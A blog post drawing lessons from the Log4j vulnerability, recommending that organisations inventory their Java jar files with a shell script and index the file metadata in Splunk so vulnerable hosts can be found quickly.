Log4j Lessons Learned

Immediately Locate Your Java Assets

Late last year I wrote Log4jFinder, a shell script that demonstrates one way to locate your java asset.   Read below to understand how to use this tool in conjunction with Splunk to instantly locate all instances of a java jar file in your enterprise.

Lesson 1: Inventory Your Java Assets

Introduction


The Log4j vulnerability has taught us a number of lessons.  In this series of Log4j related posts, I’m going to outline some lessons learned along with what we can do to be prepared for the next such vulnerability.  The first lesson is that we need an inventory of java assets at our fingertips so that we can quickly find the next java vulnerability in our enterprise.

Background


Log4j is a tool used by java developers to ease the process of producing meaningful log files from a java application.  Log files are used by developers to  debug software when problems happen.  They are also used to record events that can later be used to audit information about application behavior and underlying business metrics.

Log4j has been around for a long time and has evolved into an overly-complex tool that was originally developed to solve a simple problem (logging).  With complexity comes vulnerability.  Somewhere along the line, the ability to execute an external piece of code to populate the contents of the log files was deemed to be a necessary and useful feature for Log4j.  I’m sure it seemed useful and cool when it was implemented but, as we now see, it introduced a critical vulnerability.  We are all now paying a big price for a not terribly useful piece of coolness.

Mostly the exposure was via java based web applications that face the public.  Using sql-injection-like techniques, bad actors probe the world for victims.  Once found, they are inside and doing harm.  While this is the most likely way this vulnerability could be exploited, it is not the only way.

What Happened When We Found Out This Time?

The first thing we all did when we found out was wonder where our exposure was.   Everyone scrambled to test their applications, contact vendors, and update their end-point protectors to locate problem applications.  All of these are slow and costly methods of mitigation.  Testing for the vulnerability or going by word of mouth are slow and error prone (but not wrong).  

What We Are Going To Do Next Time?

If we were all in the habit of indexing file system meta-data in a repository like Splunk, we could simply ask Splunk to tell us which nodes on our network had the vulnerability and where it is.  We do this by making file names, sizes, types, check-sums, etc.  searchable so that we can locate the hostnames and ip address where the bad files reside. Then we can ask Splunk

Which file systems/hosts have a Log4j jar file and what version is it?

endpoint protectors can’t answer this question at time zero + 30 seconds.  Splunk can.

How To Make This Happen


Late last year I wrote a short shell script that demonstrates one way to inventory your java assets (Log4JFinder) the output of which can be fed to Splunk.   Once the information is in Splunk, we can use simple search techniques to locate nodes that have the vulnerability, then take appropriate action.

With information like that at your fingertips, decisions can be made and immediate action taken.

Walking file systems can be resource expensive, especially in a busy enterprise.  Of course we can mitigate these problems using the tools we have at our disposal.  Use cron to schedule the search during off hours.  Segment the file system walk and only perform a subset each night.  Make file system snapshots and walk those.  You know what to do.

Search your inventory with Splunk 

 Now we can, in a single search, identify all instances of Log4j in our enterprise with a single search in Splunk, in seconds…

 

 Objection: My daily daily throughput is already too much for my indexers!

Two thoughts:

First, security is important (you knew that).  If you’re falling behind, or close to falling behind, your security is going to fail.  Get the resources you need to get the right data into your index on time.   If you have the wrong data or missing data or are letting logs fall onto the floor, security is going to fail.

Second, this is a trivial amount of data to put into your index relative to the massive amount of system log data that is already going in.  Just do it.

Run your cron jobs nightly or weekly so that you are ready to find the next vulnerability in seconds rather than hours/minutes/days/months/never.

Next Topic: Expanding this concept beyond java